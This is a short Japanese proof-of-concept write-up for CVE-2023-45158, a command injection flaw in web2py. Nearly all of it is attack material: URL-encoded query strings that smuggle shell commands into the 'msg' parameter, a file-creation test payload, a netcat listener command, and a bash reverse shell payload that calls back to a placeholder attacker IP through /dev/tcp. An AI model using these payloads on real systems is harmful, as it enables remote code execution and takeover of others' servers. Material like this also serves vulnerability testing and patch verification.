
web2pyのコマンドインジェクション脆弱性であるCVE-2023-45158の概念実証エクスプロイト。ファイル作成やリバースシェルペイロードを含む、細工されたHTTPリクエストによるリモートコード実行を示します。
cd web2py
python3 web2py.py
http://<IP-ADDRESS>:8000/hack?msg=%27%3B<YOUR-COMMAND>%3B%27 を使用してコマンドを注入します。<IP-ADDRESS> と <YOUR-COMMAND> を各自の値に置き換えてください。http://<IP-ADDRESS>:8000/hack?msg=%27%3Btouch%20hack%3B%27
攻撃者のマシンで nc -l 127.0.0.1 8080 を実行します
URL http://<IP-ADDRESS>:8000/hack?msg=%27%3Bbash%20-i%20>%26/dev/tcp/<ATTACKER-IP>/8080%200>%26%201%3B%27 にアクセスします。<ATTACKER-IP> を置き換えてください。